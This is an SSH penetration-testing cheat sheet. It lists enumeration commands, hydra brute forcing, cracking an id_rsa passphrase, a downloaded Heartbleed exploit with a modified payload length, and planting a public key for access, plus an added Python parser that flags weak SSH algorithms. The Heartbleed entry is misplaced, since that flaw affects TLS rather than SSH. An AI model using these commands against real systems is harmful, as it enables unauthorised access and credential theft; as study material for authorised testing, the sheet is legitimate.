Connection
ssh <Username>@<Target IP Address> [-p <Port>]
ssh -i <ID_RSA File Name> [-p <Port>] <Username>@<Target IP Address>
NOTE: Make sure id_rsa has its permissions set to 400
Enumeration
Banner Grabbing
nc -vn <Target IP Address> 22
Grab host key
ssh-keyscan -t rsa [-p <Port>] <Target IP Address>
Vulnerability Scanning
ssh-audit -v <Target IP Address>
Nmap
Default Nmap script for SSH
nmap -sC -p <Port> <Target IP Address>
Retrieve version
nmap -sV -p <Port> <Target IP Address>
Retrieve supported algorithms
nmap --script ssh2-enum-algos -p <Port> <Target IP Address>
Retrieve host keys (full output)
nmap --script ssh-hostkey --script-args ssh_hostkey=full -p <Port> <Target IP Address>
Check authentication method
nmap --script ssh-auth-methods --script-args="ssh.user=root" -p <Port> <Target IP Address>
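Added example, not part of the original cheat sheet: a small Python parser for the server's SSH_MSG_KEXINIT message (RFC 4253 section 7.1), the packet that ssh2-enum-algos and ssh-audit read to list the offered algorithms. It flags the legacy entries a hardening review would remove; the sample KEXINIT is constructed inline and the weak-marker list is my own choice.

```python
# Parse SSH_MSG_KEXINIT (RFC 4253 section 7.1) and flag weak algorithms. Input is the
# decrypted packet payload: msg byte 20, a 16-byte cookie, then ten name-lists.
import struct
KEXINIT_FIELDS = ["kex_algorithms", "server_host_key_algorithms"] + [
    "%s_algorithms_%s" % (kind, direction) for kind in ("encryption", "mac", "compression")
    for direction in ("client_to_server", "server_to_client")] + [
    "languages_client_to_server", "languages_server_to_client"]
# Name substrings hardening guides treat as weak: SHA-1 KEX/MACs, DSA, CBC, RC4, MD5, 3DES.
WEAK_MARKERS = ("sha1", "ssh-dss", "-cbc", "arcfour", "md5", "3des")

def parse_kexinit(payload: bytes) -> dict:
    """Return {field_name: [algorithm, ...]} for the ten KEXINIT name-lists."""
    if not payload or payload[0] != 20:  # 20 == SSH_MSG_KEXINIT
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    offset, result = 17, {}  # skip the message type byte and the 16-byte cookie
    for field in KEXINIT_FIELDS:
        (length,) = struct.unpack_from(">I", payload, offset)  # uint32, big-endian
        offset += 4
        raw = payload[offset:offset + length]
        if len(raw) != length:
            raise ValueError("truncated name-list: " + field)
        offset += length
        result[field] = [n for n in raw.decode("ascii").split(",") if n]
    return result

def weak_algorithms(kexinit: dict) -> dict:
    """Return {field_name: [weak algorithm, ...]} for each field offering a weak one."""
    flagged = {}
    for field, names in kexinit.items():
        weak = [n for n in names if any(marker in n for marker in WEAK_MARKERS)]
        if weak:
            flagged[field] = weak
    return flagged

def build_kexinit(name_lists) -> bytes:
    """Build a KEXINIT payload from ten name-lists (cookie zeroed); used for sample data."""
    body = bytes([20]) + bytes(16)
    for names in name_lists:
        raw = ",".join(names).encode("ascii")
        body += struct.pack(">I", len(raw)) + raw
    return body + b"\x00" + bytes(4)  # first_kex_packet_follows=False, reserved uint32

# Constructed sample: a legacy server still offering SHA-1 KEX, DSA, CBC and MD5.
SAMPLE_KEXINIT = build_kexinit([
    ["curve25519-sha256", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"],
    ["rsa-sha2-512", "ssh-rsa", "ssh-dss"],
    ["aes256-gcm@openssh.com", "aes128-cbc"], ["aes256-gcm@openssh.com", "aes128-cbc"],
    ["hmac-sha2-256", "hmac-md5"], ["hmac-sha2-256", "hmac-md5"], ["none"], ["none"], [], [],
])
```

Feed it the payload captured from a real server (or compare its output with ssh-audit) to confirm which legacy algorithms sshd still advertises.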
Bruteforce
Normal Password Bruteforce
hydra -L <Username List> -P <Password List> -s <Port> ssh://<Target IP Address>
hydra -l <Username> -p <Password> -s <Port> ssh://<Target IP Address>
Passphrase Bruteforce
Retrieve passphrase hash from id_rsa
ssh2john id_rsa > ssh.hash
Crack hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Exploit
Heartbleed.py
curl -O https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
Modify the following part
def build_heartbeat(tls_ver):
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version
        0x00, 0x03,     # Length
        # Payload
        0x01,           # Type (Request)
        0x40, 0x00      # Payload length
    ]
    return heartbeat
to
def build_heartbeat(tls_ver):
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version
        0x00, 0x03,     # Length
        # Payload
        0x01,           # Type (Request)
        0x10, 0x00      # Payload length
    ]
    return heartbeat
python heartbleed.py <Target IP Address>
To include Hexdump
python heartbleed.py -x <Target IP Address>
For repeated runs
python heartbleed.py -n <Count> <Target IP Address>
Fake user
Copy the content of id_rsa.pub and paste it on the target machine
cat /home/kali/offsec/.ssh/id_rsa.pub